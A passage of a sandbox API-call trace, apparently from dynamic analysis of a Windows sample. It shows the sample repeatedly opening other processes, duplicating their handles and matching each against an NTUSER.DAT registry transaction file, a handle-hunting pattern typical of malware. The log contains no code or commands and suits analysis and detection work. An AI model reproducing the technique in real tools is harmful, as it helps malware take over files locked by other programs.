lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.798] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.799] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.799] CloseHandle (hObject=0x670) returned 1 [0154.799] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.799] CloseHandle (hObject=0x680) returned 1 [0154.799] CloseHandle (hObject=0x62c) returned 1 [0154.799] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.799] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.800] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.800] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.800] CloseHandle (hObject=0x670) returned 1 [0154.800] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.800] CloseHandle (hObject=0x680) returned 1 [0154.801] CloseHandle (hObject=0x62c) returned 1 [0154.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.801] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.801] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.802] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.802] CloseHandle (hObject=0x670) returned 1 [0154.803] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.803] CloseHandle (hObject=0x680) returned 1 [0154.803] CloseHandle (hObject=0x62c) returned 1 [0154.803] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.803] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.803] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.804] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.804] CloseHandle (hObject=0x670) returned 1 [0154.804] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.804] CloseHandle (hObject=0x680) returned 1 [0154.804] CloseHandle (hObject=0x62c) returned 1 [0154.804] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.804] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.805] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.805] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.805] CloseHandle (hObject=0x670) returned 1 [0154.806] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.806] CloseHandle (hObject=0x680) returned 1 [0154.806] CloseHandle (hObject=0x62c) returned 1 [0154.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.806] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.806] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.807] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.807] CloseHandle (hObject=0x670) returned 1 [0154.807] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.807] CloseHandle (hObject=0x680) returned 1 [0154.807] CloseHandle (hObject=0x62c) returned 1 [0154.807] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.807] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.808] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.808] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.809] CloseHandle (hObject=0x670) returned 1 [0154.809] CloseHandle (hObject=0x680) returned 1 [0154.809] CloseHandle (hObject=0x62c) returned 1 [0154.809] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.809] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.809] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.810] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.810] CloseHandle (hObject=0x670) returned 1 [0154.810] CloseHandle (hObject=0x680) returned 1 [0154.810] CloseHandle (hObject=0x62c) returned 1 [0154.810] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.810] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.811] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.812] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.812] CloseHandle (hObject=0x670) returned 1 [0154.812] CloseHandle (hObject=0x680) returned 1 [0154.812] CloseHandle (hObject=0x62c) returned 1 [0154.812] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.812] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.812] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.812] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.815] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.815] CloseHandle (hObject=0x670) returned 1 [0154.815] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.815] CloseHandle (hObject=0x680) returned 1 [0154.815] CloseHandle (hObject=0x62c) returned 1 [0154.815] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.816] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.816] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.817] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.817] CloseHandle (hObject=0x670) returned 1 [0154.817] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.817] CloseHandle (hObject=0x680) returned 1 [0154.817] CloseHandle (hObject=0x62c) returned 1 [0154.817] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.817] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.818] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.818] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.819] CloseHandle (hObject=0x670) returned 1 [0154.819] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.819] CloseHandle (hObject=0x680) returned 1 [0154.819] CloseHandle (hObject=0x62c) returned 1 [0154.819] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.819] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.819] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.820] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.820] CloseHandle (hObject=0x670) returned 1 [0154.820] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.820] CloseHandle (hObject=0x680) returned 1 [0154.820] CloseHandle (hObject=0x62c) returned 1 [0154.820] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.820] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.821] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.823] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.823] CloseHandle (hObject=0x670) returned 1 [0154.823] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.823] CloseHandle (hObject=0x680) returned 1 [0154.823] CloseHandle (hObject=0x62c) returned 1 [0154.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x62c [0154.823] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.824] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.825] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.825] CloseHandle (hObject=0x670) returned 1 [0154.825] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.825] CloseHandle (hObject=0x680) returned 1 [0154.825] CloseHandle (hObject=0x62c) returned 1 [0154.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.825] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.826] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.826] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.826] CloseHandle (hObject=0x670) returned 1 [0154.826] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.826] CloseHandle (hObject=0x680) returned 1 [0154.826] CloseHandle (hObject=0x62c) returned 1 [0154.826] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.827] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.827] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.828] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.828] CloseHandle (hObject=0x670) returned 1 [0154.828] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.828] CloseHandle (hObject=0x680) returned 1 [0154.828] CloseHandle (hObject=0x62c) returned 1 [0154.828] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.828] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.829] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.830] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.830] CloseHandle (hObject=0x670) returned 1 [0154.830] CloseHandle (hObject=0x680) returned 1 [0154.830] CloseHandle (hObject=0x62c) returned 1 [0154.830] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.830] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.831] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.836] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.836] CloseHandle (hObject=0x670) returned 1 [0154.836] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.836] CloseHandle (hObject=0x680) returned 1 [0154.836] CloseHandle (hObject=0x62c) returned 1 [0154.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.837] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.840] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.841] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.842] CloseHandle (hObject=0x670) returned 1 [0154.842] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.842] CloseHandle (hObject=0x680) returned 1 [0154.842] CloseHandle (hObject=0x62c) returned 1 [0154.842] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.842] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.842] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.843] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.843] CloseHandle (hObject=0x670) returned 1 [0154.843] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.843] CloseHandle (hObject=0x680) returned 1 [0154.843] CloseHandle (hObject=0x62c) returned 1 [0154.843] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.843] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.843] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.845] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.845] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.845] CloseHandle (hObject=0x670) returned 1 [0154.846] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.846] CloseHandle (hObject=0x680) returned 1 [0154.846] CloseHandle (hObject=0x62c) returned 1 [0154.846] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.846] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.846] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.847] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.847] CloseHandle (hObject=0x670) returned 1 [0154.847] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.847] CloseHandle (hObject=0x680) returned 1 [0154.847] CloseHandle (hObject=0x62c) returned 1 [0154.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.848] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.849] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.849] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.849] CloseHandle (hObject=0x670) returned 1 [0154.849] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.849] CloseHandle (hObject=0x680) returned 1 [0154.849] CloseHandle (hObject=0x62c) returned 1 [0154.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.850] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.850] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.851] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.851] CloseHandle (hObject=0x670) returned 1 [0154.851] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.851] CloseHandle (hObject=0x680) returned 1 [0154.851] CloseHandle (hObject=0x62c) returned 1 [0154.851] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.851] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 